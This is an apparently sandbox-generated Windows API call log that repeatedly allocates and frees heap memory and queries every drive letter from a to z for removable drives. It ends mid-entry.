RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.614] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.614] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.614] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.614] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.615] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.615] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.615] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.616] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.616] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.616] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.616] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.616] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.617] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.617] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.617] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.617] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.617] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.618] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.618] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.618] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.618] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.618] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.619] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.623] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0213.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0213.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.625] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.625] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.625] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0213.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0213.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0213.625] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.625] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.626] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.626] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.626] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.626] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.627] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.628] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.628] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.628] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.628] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.628] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.629] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.630] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.630] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.630] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0213.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0213.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0213.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0213.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.631] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0213.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0213.632] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0213.632] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0213.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0213.632] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0213.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0213.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0213.632] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0213.632] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0213.632] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0213.633] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0213.633] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0213.634] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0213.635] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0213.636] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0213.636] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0213.636] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0213.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0213.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0213.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0213.637] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0213.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0213.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0213.637] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0213.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0213.637] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0213.638] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0213.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0213.638] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0213.638] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, 